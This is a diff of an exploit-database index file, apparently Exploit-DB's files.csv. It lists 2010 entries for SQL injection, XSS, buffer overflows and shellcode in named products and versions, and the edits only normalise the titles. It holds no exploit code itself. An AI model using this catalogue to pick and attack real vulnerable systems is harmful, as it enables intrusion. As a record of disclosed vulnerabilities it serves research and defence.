id,file,description,date,author,platform,type,port 13990,platforms/asp/webapps/13990.txt,"Boat Classifieds SQL Injection Vulnerability",2010-06-22,Sangteamtham,asp,webapps,0 13991,platforms/php/webapps/13991.txt,"Softbiz PHP FAQ Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 13992,platforms/php/webapps/13992.txt,"Pre PHP Classifieds SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 -13993,platforms/php/webapps/13993.txt,"K-Search (SQL/XSS) Multiple Remote Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 +13993,platforms/php/webapps/13993.txt,"k-search (sql/xss) Multiple Vulnerabilities",2010-06-22,Sangteamtham,php,webapps,0 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds (printdetail.asp?Id) SQL Injection Vulnerability",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multi-Vendor Shopping Malls (products.php?sid) SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar SQL Injection Vulnerability",2010-06-23,"L0rd CrusAd3r",php,webapps,0 @@ -12391,7 +12389,7 @@ id,file,description,date,author,platform,type,port 14123,platforms/php/webapps/14123.txt,"WebDM CMS SQL Injection Vulnerability",2010-06-29,"Dr.0rYX and Cr3w-DZ",php,webapps,0 14124,platforms/php/webapps/14124.pl,"PHP-Nuke <= 8.0 Remote SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 14125,platforms/php/webapps/14125.pl,"ShopCartDx <= 4.30 - (products.php) Blind SQL Injection Exploit",2010-06-30,Dante90,php,webapps,0 -14126,platforms/php/webapps/14126.txt,"Joomla Component Gamesbox com_gamesbox 1.0.2 (id) SQL Injection Vulnerability",2010-06-30,v3n0m,php,webapps,0 +14126,platforms/php/webapps/14126.txt,"joomla component gamesbox com_gamesbox 1.0.2 - (id) SQL Injection Vulnerability",2010-06-30,v3n0m,php,webapps,0 14127,platforms/php/webapps/14127.txt,"Joomla Joomanager SQL Injection Vulnerability",2010-06-30,Sid3^effects,php,webapps,0 14128,platforms/php/webapps/14128.txt,"Joomla Component com_wmtpic 1.0 SQL Injection Vulnerability",2010-06-30,RoAd_KiLlEr,php,webapps,0 14129,platforms/linux/webapps/14129.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-30,Sid3^effects,linux,webapps,0 @@ -12407,7 +12405,7 @@ id,file,description,date,author,platform,type,port 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0 14151,platforms/php/webapps/14151.pl,"Oxygen2PHP <= 1.1.3 (post.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 14152,platforms/php/webapps/14152.pl,"Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit",2010-07-01,Dante90,php,webapps,0 -14153,platforms/windows/local/14153.pl,"Mediacoder v0.7.3.4682 Universal Buffer Overflow (SEH)",2010-07-01,MadjiX,windows,local,0 +14153,platforms/windows/local/14153.pl,"Mediacoder 0.7.3.4682 - Universal Buffer Overflow (SEH)",2010-07-01,MadjiX,windows,local,0 14154,platforms/php/webapps/14154.txt,"Joomla Component com_dateconverter 0.1 SQL Injection Vulnerability",2010-07-01,RoAd_KiLlEr,php,webapps,0 14155,platforms/asp/webapps/14155.txt,"SIDA University System SQL Injection Vulnerability",2010-07-01,K053,asp,webapps,0 14156,platforms/windows/dos/14156.txt,"Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability",2010-07-01,MSRC,windows,dos,0 @@ -12415,7 +12413,7 @@ id,file,description,date,author,platform,type,port 14160,platforms/php/webapps/14160.txt,"InterScan Web Security 5.0 Permanent XSS",2010-07-01,"Ivan Huertas",php,webapps,0 14162,platforms/php/webapps/14162.txt,"iScripts EasySnaps 2.0 Multiple SQL Injection Vulnerabilities",2010-07-01,"Salvatore Fresta",php,webapps,0 14163,platforms/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 SQL Injection Vulnerability",2010-07-01,"Salvatore Fresta",php,webapps,0 -14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 +14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion Vulnerability",2010-07-02,"John Leitch",php,webapps,0 14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 @@ -12425,7 +12423,7 @@ id,file,description,date,author,platform,type,port 14172,platforms/php/webapps/14172.txt,"Joomla Seyret Video Component (com_seyret) Blind SQL Injection Exploit",2010-07-02,RoAd_KiLlEr,php,webapps,0 14175,platforms/windows/dos/14175.pl,"Mp3 Digitalbox 2.7.2.0 (.mp3) Local Stack Overflow PoC",2010-07-02,v3n0m,windows,dos,0 14176,platforms/php/webapps/14176.c,"iScripts SocialWare 2.2.x Arbitrary File Upload Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 -14177,platforms/linux/webapps/14177.txt,"Xplico v0.5.7 (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 +14177,platforms/linux/webapps/14177.txt,"Xplico 0.5.7 - (add.ctp) Remote XSS Vulnerability",2010-07-02,"Marcos Garcia and Maximiliano Soler",linux,webapps,0 14179,platforms/windows/remote/14179.txt,"Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065)",2010-07-02,"Soroush Dalili",windows,remote,0 14180,platforms/windows/remote/14180.py,"HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 14181,platforms/windows/remote/14181.py,"HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution",2010-07-02,"S2 Crew",windows,remote,80 @@ -12439,13 +12437,13 @@ id,file,description,date,author,platform,type,port 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL); - XOR 88 encoded - 78 bytes",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,MadjiX,windows,local,0 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0 -14193,platforms/php/webapps/14193.c,"iScripts SocialWare 2.2.x Multiple Remote Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 +14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,Blake,windows,remote,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads Persistent XSS Vulnerability",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 Multiple SQL Injection Vulnerability",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 -14199,platforms/php/webapps/14199.txt,"phpaaCms v0.3.1 (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 +14199,platforms/php/webapps/14199.txt,"phpaaCms 0.3.1 - (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow Exploit",2010-07-04,Blake,windows,remote,0 14201,platforms/php/webapps/14201.txt,"phpaaCms (list.php?id) SQL Injection Vulnerability",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 @@ -12462,7 +12460,7 @@ id,file,description,date,author,platform,type,port 14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 ActiveX Head Buffer Overflow",2010-07-05,Blake,windows,local,0 14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 -14217,platforms/php/webapps/14217.txt,"WikiWebHelp v0.28 SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 +14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 14218,platforms/linux/shellcode/14218.c,"161 bytes Drop suid shell root in /tmp/.hiddenshell Linux Polymorphic Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 14219,platforms/linux/shellcode/14219.c,"62 bytes setreuid(0,0) execve(""/bin/sh"",NULL,NULL) XOR Encoded Linux Shellcode",2010-07-05,gunslinger_,linux,shellcode,0 14221,platforms/windows/shellcode/14221.html,"Safari JS JITed shellcode - exec calc (ASLR/DEP bypass)",2010-07-05,"Alexey Sintsov",windows,shellcode,0 @@ -12496,7 +12494,7 @@ id,file,description,date,author,platform,type,port 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14251,platforms/php/webapps/14251.txt,"PsNews 1.3 - SQL Injection Vulnerability",2010-07-06,S.W.T,php,webapps,0 14254,platforms/osx/remote/14254.py,"EvoCam Web Server OSX ROP Remote Exploit (Snow Leopard)",2010-07-06,d1dn0t,osx,remote,0 -14255,platforms/php/webapps/14255.txt,"Sandbox 2.0.3 Multiple Remote Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 +14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14256,platforms/windows/local/14256.txt,"HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14257,platforms/windows/remote/14257.py,"Hero DVD Remote Buffer Overflow Exploit",2010-07-07,chap0,windows,remote,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility Local Exploit Direct Ret ver.",2010-07-07,chap0,windows,local,0 @@ -12504,9 +12502,9 @@ id,file,description,date,author,platform,type,port 14260,platforms/php/webapps/14260.txt,"Sijio Community Software SQL Injection/Persistent XSS Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14261,platforms/arm/shellcode/14261.c,"ARM Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL) Shellcode Generator",2010-07-07,"Jonathan Salwan",arm,shellcode,0 14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 -14263,platforms/php/webapps/14263.txt,"ArtForms 2.1b7.2 RC2 Joomla Component Multiple Remote Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 +14263,platforms/php/webapps/14263.txt,"artforms 2.1b7.2 rc2 joomla component Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station Running Config CSRF Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 -14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 Blind SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 +14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 ""QSslSocketBackendPrivate::transmit()"" Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 @@ -12525,7 +12523,7 @@ id,file,description,date,author,platform,type,port 14281,platforms/asp/webapps/14281.txt,"KMSoft GB SQL Injection Vulnerabilty",2010-07-08,SONIC,asp,webapps,0 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 -14284,platforms/asp/webapps/14284.txt,"i-Gallery --Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 +14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 CSRF Vulnerability",2010-07-08,"Rosario Valotta",windows,webapps,0 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 @@ -12667,7 +12665,7 @@ id,file,description,date,author,platform,type,port 14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) SQL Injection Vulnerability",2010-07-23,Amine_92,php,webapps,0 14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - LIST Command Remote BoF Exploit (Post Auth) - (meta)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0 -14452,platforms/linux/dos/14452.txt,"Ubuntu 10.04 LTS - Lucid Lynx ftp Client v0.17-19build1 ACCT Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 +14452,platforms/linux/dos/14452.txt,"Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.17-19build1 ACCT - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0 14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 (ecard.php) SQL Injection Vulnerability",2010-07-23,CoBRa_21,php,webapps,0 14454,platforms/php/webapps/14454.txt,"ValidForm Builder script Remote Command Execution Vulnerability",2010-07-23,"HaCkEr arar",php,webapps,0 14455,platforms/php/webapps/14455.txt,"vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability",2010-07-24,H-SK33PY,php,webapps,0 @@ -12678,7 +12676,7 @@ id,file,description,date,author,platform,type,port 14461,platforms/asp/webapps/14461.txt,"AKY Blog SQL Injection Vulnerability",2010-07-24,v0calist,asp,webapps,0 14462,platforms/php/webapps/14462.txt,"Joomla Ozio Gallery Component (com_oziogallery) SQL Injection Vulnerability",2010-07-24,"ViRuS Qalaa",php,webapps,0 14463,platforms/php/webapps/14463.txt,"Joomla ITArmory Component (com_itarmory) SQL Injection Vulnerability",2010-07-24,Craw,php,webapps,0 -14464,platforms/windows/local/14464.pl,"Mediacoder v0.7.3.4682 (.m3u) File Universal Buffer Overflow Exploit",2010-07-24,"hadji samir",windows,local,0 +14464,platforms/windows/local/14464.pl,"Mediacoder 0.7.3.4682 - (.m3u) File Universal Buffer Overflow Exploit",2010-07-24,"hadji samir",windows,local,0 14465,platforms/php/webapps/14465.txt,"sNews 1.7 - (index.php?category) SQL Injection Vulnerability",2010-07-24,CoBRa_21,php,webapps,0 14466,platforms/php/webapps/14466.txt,"Joomla Component (com_joomdle) SQL Injection Vulnerability",2010-07-24,kaMtiEz,php,webapps,0 14467,platforms/php/webapps/14467.txt,"Joomla Component (com_youtube) SQL Injection Vulnerability",2010-07-24,Forza-Dz,php,webapps,0 @@ -12688,14 +12686,14 @@ id,file,description,date,author,platform,type,port 14472,platforms/php/webapps/14472.txt,"WhiteBoard 0.1.30 Multiple Blind SQL Injection Vulnerabilities",2010-07-25,"Salvatore Fresta",php,webapps,0 14474,platforms/php/webapps/14474.txt,"Freeway CMS 1.4.3.210 SQL Injection Vulnerability",2010-07-26,**RoAd_KiLlEr**,php,webapps,0 14476,platforms/php/webapps/14476.txt,"Joomla Component (com_joomla-visites) Remote File inclusion Vulnerability",2010-07-26,Li0n-PaL,php,webapps,0 -14477,platforms/windows/dos/14477.txt,"Media Player Classic Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 +14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 14483,platforms/php/webapps/14483.pl,"PunBB <= 1.3.4 & Pun_PM <= 1.2.6 - Remote Blind SQL Injection Exploit",2010-07-27,Dante90,php,webapps,0 14484,platforms/windows/dos/14484.html,"IE6 / 7 Remote Dos vulnerability",2010-07-27,"Richard Leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0 -14488,platforms/php/webapps/14488.txt,"Joomla Component Appointinator 1.0.1 Multiple Remote Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 -14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 UTF8 Directory Traversal Vulnerability",2010-07-28,mywisdom,unix,remote,0 +14488,platforms/php/webapps/14488.txt,"joomla component appointinator 1.0.1 Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0 +14489,platforms/unix/remote/14489.c,"apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability",2010-07-28,mywisdom,unix,remote,0 14490,platforms/php/webapps/14490.txt,"nuBuilder Remote File inclusion Vulnerability",2010-07-28,Ahlspiess,php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 14492,platforms/windows/remote/14492.c,"Symantec AMS Intel Alert Handler Service Design Flaw",2010-07-28,Spider,windows,remote,0 @@ -12704,7 +12702,7 @@ id,file,description,date,author,platform,type,port 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)",2010-07-28,fdisk,windows,local,0 14499,platforms/php/webapps/14499.txt,"Joomla Component PBBooking 1.0.4_3 Multiple Blind SQL Injection",2010-07-29,"Salvatore Fresta",php,webapps,0 -14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 +14500,platforms/php/webapps/14500.txt,"Whizzy CMS 10.02 - Local File Inclusion",2010-07-29,"Anarchy Angel",php,webapps,0 14501,platforms/php/webapps/14501.txt,"Joomla SimpleShop Component (com_simpleshop) SQL Injection Vulnerability",2010-07-29,"UnD3rGr0unD W4rri0rZ",php,webapps,0 14502,platforms/php/webapps/14502.txt,"Joomla Component (com_beamospetition) SQL Injection Vulnerability",2010-07-29,Forza-Dz,php,webapps,0 14503,platforms/windows/local/14503.pl,"HTML Email Creator 2.42 build 718 Buffer Overflow Exploit (SEH)",2010-07-29,MadjiX,windows,local,0 @@ -12740,22 +12738,22 @@ id,file,description,date,author,platform,type,port 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,MadjiX,windows,remote,0 14553,platforms/windows/remote/14553.html,"FathFTP 1.8 (FileExists Method) ActiveX Buffer Overflow (SEH)",2010-08-04,H4kr3m,windows,remote,0 14555,platforms/windows/dos/14555.py,"Mediamonkey v. 3.2.1.1297 DOS POC",2010-08-05,anonymous,windows,dos,0 -14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 Blind Sql Injection",2010-08-05,Metropolis,php,webapps,0 +14556,platforms/php/webapps/14556.txt,"Nuked-Klan Module Partenaires NK 1.5 - Blind Sql Injection",2010-08-05,Metropolis,php,webapps,0 14557,platforms/php/webapps/14557.txt,"sX-Shop (view_image.php) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14558,platforms/php/webapps/14558.txt,"sX-Shop Multiple SQL Injection Vulnerabilities",2010-08-05,CoBRa_21,php,webapps,0 14559,platforms/php/webapps/14559.txt,"APBoard 2.1.0 - (board.php?id=) SQL Injection Vulnerability",2010-08-05,secret,php,webapps,0 14560,platforms/php/webapps/14560.txt,"ccTiddly 1.7.6 - Multiple Remote File Inclusion Vulnerabilities",2010-08-05,eidelweiss,php,webapps,0 14562,platforms/php/webapps/14562.html,"Open Blog 1.2.1 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14563,platforms/php/webapps/14563.html,"BXR v0.6.8 CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14564,platforms/php/webapps/14564.html,"Amethyst v0.1.5 XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 -14565,platforms/php/webapps/14565.html,"DiamondList v0.1.6 Cross Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +14563,platforms/php/webapps/14563.html,"BXR 0.6.8 - CSRF Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +14564,platforms/php/webapps/14564.html,"Amethyst 0.1.5 - XSS Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 +14565,platforms/php/webapps/14565.html,"DiamondList 0.1.6 - Cross Site Request Forgery Vulnerability",2010-08-05,"High-Tech Bridge SA",php,webapps,0 14566,platforms/windows/local/14566.c,"Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 -14569,platforms/php/webapps/14569.txt,"Joomla Component cgTestimonial 2.2 Multiple Remote Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 +14569,platforms/php/webapps/14569.txt,"joomla component cgtestimonial 2.2 Multiple Vulnerabilities",2010-08-06,"Salvatore Fresta",php,webapps,0 14570,platforms/php/webapps/14570.txt,"Joomla Component com_neorecruit 1.4 SQL Injection Vulnerability",2010-08-07,v3n0m,php,webapps,0 14572,platforms/php/webapps/14572.txt,"Tycoon CMS Record Script SQL Injection Vulnerability",2010-08-07,Silic0n,php,webapps,0 14573,platforms/linux/dos/14573.txt,"LibTIFF 'td_stripbytecount' NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-08-07,"Tomas Hoger",linux,dos,0 14576,platforms/windows/local/14576.c,"Mini-stream Ripper 3.1.2.1 - Buffer Overflow (DEP Bypass)",2010-08-07,"fl0 fl0w",windows,local,0 -14578,platforms/php/webapps/14578.php,"PHPKick v0.8 statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 +14578,platforms/php/webapps/14578.php,"PHPKick 0.8 - statistics.php SQL Injection Exploit",2010-08-08,garwga,php,webapps,0 14580,platforms/windows/remote/14580.html,"Advanced File Vault(eSellerateControl350.dll) Activex Heap Spray 0day",2010-08-08,"ThE g0bL!N",windows,remote,0 14581,platforms/windows/local/14581.py,"myMP3-Player 3.0 - Buffer Overflow Exploit",2010-08-08,"Oh Yaw Theng",windows,local,0 14582,platforms/windows/dos/14582.pl,"ffdshow Video Codec Denial of Service Vulnerability",2010-08-08,"Nishant Das Patnaik",windows,dos,0 @@ -12786,7 +12784,7 @@ id,file,description,date,author,platform,type,port 14611,platforms/windows/dos/14611.c,"Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048)",2010-08-10,MJ0011,windows,dos,0 14612,platforms/windows/local/14612.py,"Mediacoder 0.7.5.4710 Buffer Overflow Exploit",2010-08-11,anonymous,windows,local,0 14613,platforms/windows/dos/14613.py,"Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service",2010-08-11,TheLeader,windows,dos,0 -14614,platforms/php/webapps/14614.txt,"clearBudget v0.9.8 Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 +14614,platforms/php/webapps/14614.txt,"clearBudget 0.9.8 - Remote File Include Vulnerability",2010-08-11,Offensive,php,webapps,0 14615,platforms/php/webapps/14615.txt,"phpMUR Remote File Disclosure Vulnerability",2010-08-11,Offensive,php,webapps,0 14617,platforms/jsp/webapps/14617.txt,"Apache JackRabbit 2.0.0 webapp XPath Injection",2010-08-11,"ADEO Security",jsp,webapps,0 14618,platforms/php/webapps/14618.txt,"SaurusCMS 4.7.0 - Remote File Inclusion Vulnerability",2010-08-11,LoSt.HaCkEr,php,webapps,0 @@ -12818,7 +12816,7 @@ id,file,description,date,author,platform,type,port 14654,platforms/php/webapps/14654.php,"CMSQLite <= 1.2 & CMySQLite <= 1.3.1 Remote Code Execution Exploit",2010-08-15,BlackHawk,php,webapps,0 14655,platforms/php/webapps/14655.txt,"Joomla Component (com_equipment) SQL Injection Vulnerability",2010-08-16,Forza-Dz,php,webapps,0 14656,platforms/php/webapps/14656.txt,"Joomla Component Jgrid 1.0 Local File Inclusion Vulnerability",2010-08-16,"Salvatore Fresta",php,webapps,0 -14658,platforms/windows/remote/14658.txt,"123 Flashchat version 7.8 Multiple Remote Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 +14658,platforms/windows/remote/14658.txt,"123 flashchat 7.8 - Multiple Vulnerabilities",2010-08-16,Lincoln,windows,remote,0 14659,platforms/php/webapps/14659.txt,"Joomla Component OnGallery SQL Injection Vulnerability",2010-08-16,"al bayraqim",php,webapps,0 14663,platforms/windows/local/14663.py,"MUSE 4.9.0.006 - (.m3u) Local Buffer Overflow Exploit",2010-08-16,"Glafkos Charalambous ",windows,local,0 14664,platforms/windows/local/14664.py,"MUSE 4.9.0.006 - (.pls) Local Universal Buffer Overflow (SEH)",2010-08-16,"Glafkos Charalambous ",windows,local,0 @@ -12838,7 +12836,7 @@ id,file,description,date,author,platform,type,port 14683,platforms/windows/dos/14683.py,"Httpdx 1.5.4 Multiple Denial of Service Vulnerabilities (http-ftp) PoC",2010-08-18,Dr_IDE,windows,dos,0 14684,platforms/php/webapps/14684.php,"Open-Realty 2.5.7 Local File Disclosure Vulnerability",2010-08-18,"Nikola Petrov",php,webapps,0 14685,platforms/windows/dos/14685.pl,"RockN Wav Editor 1.8 Denial of Service Vulnerability",2010-08-18,d4rk-h4ck3r,windows,dos,0 -14686,platforms/php/webapps/14686.txt,"VBbuletin 4.0.4 Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps,0 +14686,platforms/php/webapps/14686.txt,"vbbuletin 4.0.4 - Multiple Vulnerabilities",2010-08-19,mc2_s3lector,php,webapps,0 14687,platforms/windows/dos/14687.txt,"SonicWALL E-Class SSL-VPN ActiveX Control Format String Overflow",2010-08-19,"Nikolas Sotiriu",windows,dos,0 14688,platforms/freebsd/local/14688.c,"FreeBSD mbufs() sendfile Cache Poisoning Privilege Escalation",2010-08-19,Kingcope,freebsd,local,0 14689,platforms/windows/dos/14689.pl,"Tuniac 100723 Denial of Service Vulnerability",2010-08-19,d4rk-h4ck3r,windows,dos,0 @@ -12858,7 +12856,7 @@ id,file,description,date,author,platform,type,port 14707,platforms/php/webapps/14707.txt,"Joomla Component (com_Fabrik) SQL Injection Vulnerability",2010-08-21,Mkr0x,php,webapps,0 14709,platforms/asp/webapps/14709.txt,"netStartEnterprise 4.0 - SQL Injection Vulnerability",2010-08-22,L1nK,asp,webapps,0 14711,platforms/windows/dos/14711.py,"Tplayer V1R10 - Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 -14712,platforms/php/webapps/14712.txt,"4images 1.7.8 Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 +14712,platforms/php/webapps/14712.txt,"4images 1.7.8 - Remote File Inclusion Vulnerability",2010-08-23,LoSt.HaCkEr,php,webapps,0 14713,platforms/windows/dos/14713.py,"Abyssal Metal Player 2.0.9 Denial of Service Vulnerability",2010-08-23,41.w4r10r,windows,dos,0 14714,platforms/php/webapps/14714.txt,"Ananta Gazelle CMS Multiple Vulnerabilities",2010-08-23,Sweet,php,webapps,0 14716,platforms/php/webapps/14716.txt,"AneCMS /registre/next - SQL Injection Vulnerability",2010-08-23,Sweet,php,webapps,0 @@ -12881,7 +12879,7 @@ id,file,description,date,author,platform,type,port 14739,platforms/windows/local/14739.c,"BS.Player <= 2.56 build 1043 DLL Hijacking Exploit (mfc71loc.dll)",2010-08-25,diwr,windows,local,0 